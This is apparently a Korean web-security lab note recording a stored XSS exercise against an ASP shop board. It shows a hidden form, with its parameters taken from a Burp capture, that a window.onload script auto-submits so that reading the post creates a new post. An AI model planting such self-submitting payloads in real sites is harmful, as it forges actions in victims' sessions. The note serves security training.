[XSS] 게시글을 읽었을 때, 새로운 게시글이 작성될 수 있도록 조작

카테고리

[실습] 웹 공격위협

상태

완료

게시일

2024/04/25

태그

XSS

Q1. 게시글을 읽었을 때, 새로운 게시글이 작성될 수 있도록 조작

1) test 글 작성 후 Burp 이용하여 request 확인

2) POST 요청의 action 값, parameter 추출

3) 추출한 파라미터 기반 게시물에 HTML 코드 작성

<form name="write" action="./shop_board_write_ok.asp" method="POST" enctype="multipart/form-data">
<input type="hidden" name="num">
<input type="hidden" name="ref">
<input type="hidden" name="r_step">
<input type="hidden" name="reforder">
<input type="hidden" name="name" value=hacker>
<input type="hidden" name="email" value="kisec@co.kr">
<input type="hidden" name="home" value="http://">
<input type="hidden" name="title" value=success>
<input type="hidden" name="coding" value="text">
<input type="hidden" name="content" value="test">
<input type="hidden" name="file_up">
<input type="hidden" name="tank" value="cha_bg01.gif">
<input type="hidden" name="pwd" value="1">
</form>
<script>
window.onload = function() {
    document.write.submit();
};
</script>
HTML
복사

스크립트에 window.onload, document.write.submit() 를 사용하여 로드 시 모든 parameter 가 hidden 으로 제출될 수 있도록 함

[XSS] 게시글을 읽었을 때, 새로운 게시글이 작성될 수 있도록 조작

Q1. 게시글을 읽었을 때, 새로운 게시글이 작성될 수 있도록 조작

1) test 글 작성 후 Burp 이용하여 request 확인

2) POST 요청의 action 값, parameter 추출

3) 추출한 파라미터 기반 게시물에 HTML 코드 작성

4) 공격 성공 (게시물 클릭 시 새 게시물 작성됨)